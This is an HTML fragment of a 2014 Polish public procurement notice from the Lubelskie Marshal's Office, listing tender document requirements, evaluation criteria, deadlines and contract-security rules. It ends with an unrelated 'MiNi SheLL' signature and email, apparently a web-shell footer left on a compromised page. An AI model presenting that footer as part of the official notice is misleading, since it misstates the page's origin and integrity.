<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji udzielonej na przedmiot zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy określa  § 4, 7, 18 istotnych postanowień umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> https://umwl.bip.lubelskie.pl/index.php?id=85<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Lubelskiego w Lublinie
ul. Spokojna 4
20-074 Lublin
(II piętro, pokój 222 w bud. przy ul. Lubomelskiej 1-3)
fax: (081 ) 44 16 535
pawel.wojtowicz@lubelskie.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2014 godzina 12:00, miejsce: Urząd Marszałkowski Województwa Lubelskiego w Lublinie
ul. Spokojna 4,
20- 074 Lublin
(I piętro, pokój 128 - KANCELARIA OGÓLNA w budynku przy ul. Lubomelskiej 1- 3).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przedmiot zamówienia, o którym mowa w ust. 1 będzie finansowany przez Województwo Lubelskie w następujący sposób:
1)	w zakresie dotyczącym Lubelskiego Centrum Konferencyjnego będzie współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwój Polski Wschodniej na lata 2007 - 2013 Oś Priorytetowa: III. Wojewódzkie ośrodki wzrostu; Działanie: III.2. Infrastruktura turystyki kongresowej i targowej;
2)	w zakresie dotyczącym inwestycji pn. Budowa siedziby Urzędu Marszałkowskiego Województwa Lubelskiego w Lublinie będzie finansowany z budżetu Województwa Lubelskiego.
2. termin realizacji zamówienia określony w sekcji obowiązuje w następującem zakresie:
a) LCK - do 30 kwietnia 2015 r.,
b) BUM - do 31 maja 2015 r.
3. Zabezpieczenie należytego wykonania umowy w wysokości łącznej 5 % ceny całkowitej podanej w ofercie (oddzielnie w kwotach za poszczególne obiekty BUM i LCK), Wykonawca wnosi, przed zawarciem umowy. 
1)	Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:
a.	pieniądzu;
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
2)	Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Urzędu Marszałkowskiego Województwa Lubelskiego Nr 96 1020 3150 0000 3102 0047 7489.
3)	W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.
4)	Zabezpieczenie wniesione w pieniądzu Zamawiający przechowuje na oprocentowanym rachunku bankowym.
5)	W przypadku zabezpieczenia należytego wykonania umowy w formie opcjonalnie gwarancji ubezpieczeniowej lub bankowej gwarancja winna być nieodwołalna, bezwarunkowa i płatna na każde żądanie Zamawiającego. Wykonawca ma obowiązek, przed zawarciem umowy oraz po każdorazowym odnowieniu polisy przedłożyć Zamawiającemu oryginał umowy lub kserokopię umowy, potwierdzoną za zgodność 
z oryginałem przez Notariusza lub przez udzielającego gwarancji w terminie do 14 dni kalendarzowych od daty wystawienia polisy. 
6)	Zabezpieczenie należytego wykonania umowy, o którym mowa w ust.1, dotyczy roszczeń Zamawiającego względem Wykonawcy z tytułu niewykonania lub nienależytego Wykonania umowy. Z udzielonego zabezpieczenia Zamawiający może zaspokoić swoje roszczenia powstałe z winy Wykonawcy także w przypadku odstąpienia lub rozwiązania Umowy przez Zamawiającego z winy Wykonawcy.
7)	Zamawiający zwraca 70 % zabezpieczenia w terminie 30 dni od dnia wykonania przedmiotu zamówienia i uznania przez Zamawiającego za należycie wykonane. 
8)	Kwota pozostawiona na zabezpieczenie roszczeń z tytułu rękojmi za wady nie może przekraczać 30% wysokości zabezpieczenia i jest zwracana nie później niż w 15 dniu po upływie okresu rękojmi za wady.
9)	W przypadku nienależytego wykonania zamówienia lub nieusunięcia wad przedmiotu zamówienia, zabezpieczenie wraz z powstałymi odsetkami staje się własnością Zamawiającego, do wysokości roszczeń Zamawiającego z tytułu niewykonania lub nienależytego wykonania Umowy. 
10)	W sytuacji gdy wystąpi konieczność przedłużenia terminu realizacji zamówienia 
w stosunku do terminu przedstawionego w ofercie, Wykonawca przed podpisaniem aneksu lub najpóźniej w dniu jego podpisywania, zobowiązany jest do przedłużenia terminu ważności wniesionego zabezpieczenia należytego wykonania umowy, albo jeśli nie jest to możliwe, do wniesienia nowego zabezpieczenia na okres wynikający z Aneksu do Umowy. 
11)	W trakcie realizacji Umowy Wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w art. 148 ust. 1 ustawy - Prawo zamówień publicznych. Za zgodą Zamawiającego Wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w art. 148 ust. 2 tej ustawy. Zmiana formy zabezpieczenia musi być dokonana z zachowaniem ciągłości zabezpieczenia i bez zmiany jego wysokości. 
12)	Potrącanie kar umownych z wniesionego zabezpieczenia należytego wykonania umowy po pisemnym powiadomieniu przez Zamawiającego o naliczeniu kary - jest możliwe bez uprzedniego wezwania do zapłaty..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com